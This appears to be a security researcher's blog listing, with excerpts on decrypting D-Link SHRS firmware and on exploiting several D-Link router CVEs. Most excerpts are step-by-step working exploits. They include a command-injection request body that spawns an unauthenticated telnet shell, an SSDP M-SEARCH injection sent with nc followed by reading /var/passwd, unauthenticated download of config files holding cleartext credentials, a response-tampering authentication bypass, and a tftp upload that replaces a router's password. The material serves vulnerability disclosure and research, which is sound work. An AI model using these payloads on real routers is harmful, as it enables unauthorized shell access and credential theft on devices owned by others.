Posts

Decrypting D-Link Encrypted Firmware (SHRS)

Image
Introduction  D-Link firmware with SHRS magic bytes contain firmware encrypted using AES 128 CBC with key as 0xC05FBF1936C99429CE2A0781F08D6AD8. Original firmware can be obtained by extracting the encrypted block from the firmware and then decrypting using this key. Header Structure Header structure of firmware along with corresponding values for a sample firmware DIR-867_FW1.30B07.bin is given in table. Offset Size (Bytes) Item Value (DIR-867_FW1.30B07) 0 4 Magic Bytes SHRS 4 4 Decrypted FW Size 0x9D2AF9 8 4 Encrypted Block Size 0x9D2B00 0xC 16 IV 0x67C6697351FF4AEC29CDBAABF2FBE346 0x1C 64 SHA512(Decrypted FW + Key) 0x7139.......AA94 0x5C 64 SHA512(Decrypted FW) 0xDAC3.......5DA7 0x9C 64 SHA512(Encrypted Block) 0x7D3F.......12D2 0xDC 512 Unused 00 ...

CVE-2021-45382 D-Link Unauthenticated Remote Command Execution Vulnerability

Image
 Introduction A Remote Command Execution (RCE) vulnerability exists in all series H/W revisions of D-link DIR-810L, DIR-820L/LW, DIR-826L, DIR-830L, and DIR-836L routers via ddnshostname and ddnusername parameters in POST request to ddns_check.ccp. Exploit Open Firefox browser and enable web developer tools by going to Menu > More tools > Web Developer Tools . Select Network tab in Web Developer Tools window. Open management URL of the router. Eg. http://192.168.0.1 Select any request in the Web Developer Tools and click Resend > Edit and Resend option. Modify HTTP method to POST and URL to  /ddns_check.ccp Set the request data to  ccp_act=doCheck&ddnsHostName=;telnetd -l /bin/sh;&ddnsUsername=a&ddnsPassword=b Here the injected command " telnetd -l /bin/sh"  starts telnet service, which can be used to interact with router's OS without any authentication.  Command injection can be performed using  ddnsHostName or ddnsUsername parameter...

CVE-2019-15655 D-Link DSL-2875AL Unauthenticated Configuration Export

Image
 Introduction Configuration file of D-Link DSL-2875AL devices can be exported without authentication via a crafted HTTP request to the web server. This leads to configuration file export and disclosure of credentials stored in cleartext. Steps Download configuration file using URL: http://<ipaddress>/romfile.cfg Obtain the username and password from the   Account  tag in downloaded romfile.cfg XML file. Video

CVE-2019-17507 D-Link DIR-816 Router Authentication Bypass Vulnerability

Image
 Introduction Management pages of D-Link DIR-816 A1 1.06 devices can be accessed without authentication via a client that ignores the 'top.location.href = "/dir_login.asp"' line in a .asp file. Steps to exploit this vulnerability using Burp Suite are given below. Steps 1. Open the login page of router in Burp Suite browser. 2. Disable HTTP request interception by going to Proxy > Options tab of Burp Suite and uncheck Intercept requests based on following rules  checkbox. 3. Enable HTTP server response interception by checking Intercept responses based on the following rules  checkbox. 4. Turn on intercept in Proxy > Intercept tab and go to URL http:// targetip /d_status.asp. From all the intercepted responses delete the line ' top.location.href = "/dir_login.asp"; ' All the router management pages can be accessed by removing the line 'top.location.href = "/dir_login.asp;"' from the responses. Automation To automatically delete...

Dump memory to file from U-Boot console using Memory Display (md) log

Image
 Introduction Dump firmware or other contents from memory of a device with U-Boot bootloader to a file by converting output of memory display (md) command to binary image.  Steps 1. Connect to U-Boot console using picocom and save all outputs in a log file using commad given below. Here the output is saved to log file named 'mdb.log'. sudo picocom /dev/ttyUSB0 --baud 115200 --logfile mdb.log 2. Display the contents of the memory using command: md.b <address> <length> Figure below shows the command to display memory contents from address 0x400000000 and of length 0x20000 (128KB) . The data in this example corresponds to a jffs2 file system. 3. Once the execution completes, edit the log file and remove everything other than md.b output. 4. Clone the github project uboot-mdb-dump.git git clone https://github.com/gmbnomis/uboot-mdb-dump.git 5. Generate the binary image file 'output.bin' from log file 'mdb.log'. python3 uboot-mdb-dump/uboot_mdb_to_image.p...

CVE-2021-3707 D-Link DSL-2750U Router Unauthorized Configuration Modification Vulnerability

Image
Introduction D-Link DSL-2750U router with firmware vME1.16 or prior versions is vulnerable to unauthorized configuration modification. Exploit Export configuration file from a DSL-2750U router whose password is known. Connect to the tftp server on router whose password is not known and send the configuration file containing known password. tftp 192.168.1.1 binary put cfg.xml All configuration, including the password of the router will be changed to that in uploaded configuration file. Video

CVE-2021-29379 D-Link DIR-802 UPnP M-SEARCH Command Injection Vulnerability

Image
Introduction Authentication can be bypassed on D-Link DIR-802 A1 by injecting a payload into the Search Target (ST) field of the SSDP M-SEARCH discover packet. Exploit Create a text file with SSDP M-SEARCH payload to inject command to start telnet service on port 1234. M-SEARCH * HTTP/1.1 HOST:192.168.0.1:1900 ST:urn:schemas-upnp-org:service:WANIPConnection:1;telnetd -p 1234 MX:2 MAN:"ssdp:discover" Send the payload to UPnP UDP port 1900 using nc. nc -u 192.168.0.1 1900 < payload.txt Connect to telnet service on TCP port 1234.  nc -v 192.168.0.1 1234 View the credentials from file /var/passwd. cat /var/passwd Video